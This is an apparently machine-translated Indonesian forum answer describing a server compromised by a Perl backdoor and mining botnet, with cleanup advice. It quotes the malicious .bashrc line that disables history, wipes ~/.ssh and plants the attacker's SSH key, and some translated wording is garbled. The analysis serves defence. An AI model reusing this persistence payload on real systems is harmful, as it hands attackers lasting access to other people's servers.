Hal yang sama terjadi pada saya, dan saya perhatikan kemarin. Saya memeriksa file /var/log/syslogdan IP ini (185.234.218.40) tampaknya secara otomatis menjalankan cronjobs.
Saya memeriksanya di http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) dan memiliki beberapa laporan. File-file ini diedit oleh trojan:
- .bashrc
- .ssh / berwenang_kunci
Saya menemukan ini di akhir .bashrc(yang dijalankan setiap kali bash dibuka):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Ini menghapus authorized_keysfile Anda , yang merupakan daftar kunci SSH yang diizinkan untuk terhubung tanpa kata sandi. Kemudian, itu menambahkan kunci SSH penyerang:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Selanjutnya, saya menemukan folder ini:, di /tmp/.X13-unix/.rsyncmana semua malware. Saya bahkan menemukan file,, /tmp/.X13-unix/.rsync/c/ipfile yang berisi 70.000 alamat IP, yang kemungkinan besar adalah korban atau server simpul lainnya.
Ada 2 solusi: A:
Tambahkan firewall yang memblokir semua koneksi keluar kecuali port 22 dan lainnya yang Anda anggap perlu dan aktifkan fail2ban, sebuah program yang melarang alamat IP setelah X upaya password gagal
Bunuh semua pekerjaan cron:,
ps aux | grep cronlalu bunuh PID yang muncul
Ubah kata sandi Anda menjadi kata sandi yang aman
B:
Cadangkan semua file atau folder yang Anda butuhkan atau inginkan
Setel ulang server dan instal ulang Ubuntu, atau langsung buat tetesan baru
Seperti yang dikatakan Thom Wiggers, Anda tentu saja bagian dari botnet penambangan bitcoin, dan server Anda memiliki pintu belakang . Backdoor menggunakan eksploitasi perl, sebuah file yang terletak di sini /tmp/.X13-unix/.rsync/b/run:, mengandung ini ( https://pastebin.com/ceP2jsUy )
Folder yang paling mencurigakan yang saya temukan adalah:
Akhirnya, ada sebuah artikel yang berhubungan dengan Perl Backdoor di sini:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
Saya harap Anda menemukan ini berguna.
.firefoxcatchemungkin tidak ada hubungannya dengan firefox - mungkinkah ini penambang bitcoin? Coba unggah file yang dapat dieksekusi ke virustotal.